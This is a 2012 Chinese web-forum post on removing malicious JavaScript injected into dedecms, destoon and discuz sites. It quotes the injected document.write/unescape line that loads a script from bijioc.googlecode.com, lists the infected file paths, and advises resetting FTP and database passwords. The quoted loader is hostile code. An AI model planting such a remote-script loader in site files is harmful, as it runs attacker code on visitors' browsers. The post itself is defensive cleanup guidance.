源码论坛公告:本站是一个交流学习建站资源的社区论坛,旨在交流学习源码脚本等资源技术,欢迎大家投稿发言! 【点击此处将锦尚放在桌面

源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

 找回密码
 会员注册

QQ登录

只需一步,快速开始

查看: 7003|回复: 2
打印 上一主题 下一主题

[服务器安全] 网站被恶意弹出bijioc.googlecode.com注入解决办法

[复制链接]

19

主题

6808

帖子

5

金币

中级会员

Rank: 3Rank: 3

积分
5300
QQ
跳转到指定楼层
1#
发表于 2012-2-29 09:39:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
刚刚发现自己的网站访问时,总是提示弹出一个SVN的窗口

上面的地址是 http://bijioc.googlecode.com/

看来是被恶意js注入了,

目前网站用的是dedecms,destoon的程序,于是百度一下,发现中招的还不少

原来是被在引用的js文件中注入了如下代码:
1        document.write(unescape("%3Cscript src='http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v="+(new Date().toDateString().replace(/\s/g, ''))+".js' type='text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>'%3E%3C/script%3E"));

下面说下我清理过程,首先还是打开我们网站的主页,依然是弹出那个可恶的窗口,关闭,然后用查看下网页源码没有发现异常,那是因为这段代码是利用js输出的,需要查看生成后的最终代码,可以利用firefox中的web developer插件中查看源代码中的查看处理后的源码项,就发现居然在头部引用了一个如下格式的js脚本:
1        <script type="text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>" src="static/js/common.js?9VJ"/>
2        <script type="text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>" src="static/js/common.js?9VJ">// <![CDATA[
3        <script type="text/javascript" src="http://bijioc.googlecode.com/svn/trunk/js/navigatebbs.js?v=WedFeb292012.js"/>

接下来就是查找被注入的js文件是哪个了,以上面的为例就是common.js文件了,以此类推,依次排查有问题的网站页面源码,只要寻找生成后的页面代码中存在bijioc.googlecode.com前面的js文件修改就行了,为了方便大家总结下我的网站被注入的dedecms的js路径是 /站点根目录/include/dedeajax2.js ;destoon的js路径是/站点目录/file/script/common.js; discuz的js路径/站点目录/static/js/common.js;

最后还要提醒大家及时修改ftp的密码和数据库密码,同时排查空间中是不是有木马程序,因为既然js文件被人修改说明网站的密码已经被人无限制,能够上场文件了,一定存在木马,要彻底清查。

转自:www.mikel.cn
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享

1

主题

10

帖子

0

金币

初级会员

Rank: 1

积分
7
QQ
2#
发表于 2012-5-15 22:48:55 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
4567

1

主题

10

帖子

0

金币

初级会员

Rank: 1

积分
7
QQ
3#
发表于 2012-5-15 22:49:04 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
7675656576788990
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

锦尚中国源码论坛

聚合标签|锦尚中国,为中国网站设计添动力 ( 鲁ICP备09033200号 ) |网站地图

GMT+8, 2024-11-11 06:14 , Processed in 0.163512 second(s), 26 queries .

带宽由 锦尚数据 提供 专业的数据中心

© 锦尚中国源码论坛 52jscn Inc. 非法入侵必将受到法律制裁 法律顾问:IT法律网 & 褚福省律师 锦尚爱心 版权申诉 版权与免责声明